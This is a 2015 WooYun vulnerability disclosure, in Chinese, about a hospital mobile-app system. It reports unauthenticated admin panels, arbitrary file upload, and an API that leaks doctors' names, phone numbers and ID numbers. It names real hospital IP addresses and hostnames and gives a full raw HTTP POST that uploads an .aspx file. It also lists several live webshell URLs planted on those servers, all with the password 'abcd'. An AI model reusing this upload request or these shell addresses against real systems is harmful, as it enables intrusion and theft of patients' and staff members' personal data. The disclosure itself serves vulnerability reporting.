当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104068

漏洞标题:某掌上医院系统通用型任意文件上传

相关厂商:智业软件股份有限公司

漏洞作者: 路人甲

提交时间:2015-03-27 15:48

修复时间:2015-06-30 13:36

公开时间:2015-06-30 13:36

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-27: 细节已通知厂商并且等待厂商处理中
2015-04-01: 厂商已经确认,细节仅向厂商公开
2015-04-04: 细节向第三方安全合作伙伴开放
2015-05-26: 细节向核心白帽子及相关领域专家公开
2015-06-05: 细节向普通白帽子公开
2015-06-15: 细节向实习白帽子公开
2015-06-30: 细节向公众公开

简要描述:

1#后台未授权访问
2#任意文件上传
3#接口设计存在缺陷,导致敏感信息泄漏

详细说明:

今天去医院看到个掌上医院的二维码,就扫了一下,然后就有了下面的事情。
智业软件成立于1997年,是一家拥有17年以上专业研发和服务背景,专注于提供医疗卫生信息化领域系统解决方案的企业。
以下以福鼎市医院为例

QQ截图20150326210242.png


QQ截图20150326210631.png


Android公众版:
Http://36.250.159.106:5155/mhpublic.apk
Android医护版:
Http://36.250.159.106:5156/mhdoctor.apk
1#后台未授权访问
http://*/admin
Http://36.250.159.106:5155/admin

QQ截图20150326210728.png


QQ截图20150326211027.png


我对该站进行了端口扫描,发现
http://36.250.159.106:5255/admin

QQ截图20150326211554.png


http://36.250.159.106:5256/admin

QQ截图20150326211800.png


http://36.250.159.106:9000/admin

QQ截图20150326212005.png


2#任意文件上传

QQ截图20150326212201.png


在用户维护的编辑头像处,存在任意文件上传,是直接上传,未对后缀进行限制

QQ截图20150326212303.png


QQ截图20150326212526.png


一句话地址:http://36.250.159.106:9000/avatars/020b2328-2960-49b9-a667-c12b357a4ac3.aspx
密码abcd

QQ截图20150326212702.png


POC

POST http://修改我:端口/Admin/StaffMag/UploadStaffImg HTTP/1.1
Accept: text/*
Content-Type: multipart/form-data; boundary=----------ei4ei4ae0KM7KM7cH2cH2Ef1Ef1Ef1
User-Agent: Shockwave Flash
Host: 修改我:端口
Content-Length: 533
Connection: Keep-Alive
Pragma: no-cache
------------ei4ei4ae0KM7KM7cH2cH2Ef1Ef1Ef1
Content-Disposition: form-data; name="Filename"
wooyun.aspx
------------ei4ei4ae0KM7KM7cH2cH2Ef1Ef1Ef1
Content-Disposition: form-data; name="Filedata"; filename="wooyun.aspx"
Content-Type: application/octet-stream
wooyun test
------------ei4ei4ae0KM7KM7cH2cH2Ef1Ef1Ef1
Content-Disposition: form-data; name="Upload"
Submit Query
------------ei4ei4ae0KM7KM7cH2cH2Ef1Ef1Ef1--


我们直接试试其它端口

QQ截图20150326213059.png


http://36.250.159.106:5155/avatars/332894e8-c643-4bd4-924a-b65658168f72.aspx 密码abcd

QQ截图20150326213415.png


http://36.250.159.106:5256/avatars/f5706c38-eed3-4cee-a656-61cef2c440c4.aspx
http://36.250.159.106:5255/avatars/b1644026-56dd-4014-b5f0-640b0dceea75.aspx
3#接口设计存在缺陷,导致敏感信息泄漏
http://36.250.159.106:5155

QQ截图20150326213718.png


我一个个点过去,发现http://36.250.159.106:5155/api/Staff/GetStaffList
返回了一个医生列表回来

QQ截图20150326213956.png


注意观察,里面有医生姓名、电话、还有身份证字段等等,如果医院把这个系统用起来的话,能收集到很多信息。
http://36.250.159.106:5255/api/Staff/GetStaffList
http://36.250.159.106:5256/api/Staff/GetStaffList
http://36.250.159.106:9000/api/Staff/GetStaffList
以下几个案例供复现,因为是手机端的系统,不太好找,只能通过厂商官网的案例去推
后台(注意后台不是每个端口都能访问,闽东医院只有5256,也许和配置有关)http://mdyy.mh.zoesoft.net:5256/Admin/StaffMag/Index
接口
http://mdyy.mh.zoesoft.net:5256/api/Staff/GetStaffList
http://mdyy.mh.zoesoft.net:5155/api/Staff/GetStaffList
http://mdyy.mh.zoesoft.net:5156/api/Staff/GetStaffList
http://mdyy.mh.zoesoft.net:5255/api/Staff/GetStaffList
上传(直接poc)(该站只有5256和5156存在上传):

QQ截图20150326224100.png


http://mdyy.mh.zoesoft.net:5256/avatars/cfedef05-198d-45d0-9900-2c9e6c3aa9e3.aspx

QQ截图20150326224203.png


http://mdyy.mh.zoesoft.net:5156/avatars/2cb87f1a-040f-4e52-92e5-22895c8a107e.aspx

QQ截图20150326224331.png


克拉玛依市中心医院http://www.xslmed.net
后台(只有5155和5255,访问会报错,不明原因):
http://www.xslmed.net:5155/admin
http://www.xslmed.net:5255/admin
接口没有返回值~
http://www.xslmed.net:5155/api/Staff/GetStaffListNoGroup
http://www.xslmed.net:5255/api/Staff/GetStaffListNoGroup
上传(5155和5152端口):

QQ截图20150326225509.png


原来是没有监听程序~
上传失败,估计得等监听恢复
厦门第一医院:http://xmdyyy.mh.zoesoft.net
后台:无法访问
接口(只有5155):http://xmdyyy.mh.zoesoft.net:5155/api/Staff/GetStaffListNoGroup

QQ截图20150326231937.png


上传(只有5156端口):
http://xmdyyy.mh.zoesoft.net:5156/avatars/39dbd195-459d-40e6-9b70-292695feac7f.aspx

QQ截图20150326232146.png


QQ截图20150326232206.png


最后再来个官网http://117.25.173.18,扫了半天,端口真多.....
后台:http://117.25.173.18:6170/admin
接口:
http://117.25.173.18:9000/api/Staff/GetStaffListNoGroup
http://117.25.173.18:6167/api/Staff/GetStaffListNoGroup
上传:
http://117.25.173.18:6170/avatars/7cb7af2f-5c48-4115-928b-3f08093d4ec0.aspx

QQ截图20150326234013.png


在医院内部应该也存在一些案例,医院的病患信息还是值点钱的

漏洞证明:

QQ截图20150326210728.png


QQ截图20150326212526.png


QQ截图20150326212628.png


QQ截图20150326213956.png


修复方案:

接口、后台该放内网的还是要放内网
接口调用加个key什么的
上传点过滤一下吧,最少上传目录权限限制一下

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-04-01 13:35

厂商回复:

最新状态:

2015-04-01:CNVD确认并复现所述情况,已经转由CNCERT下发给福建分中心,由其后续协调网站管理单位处置。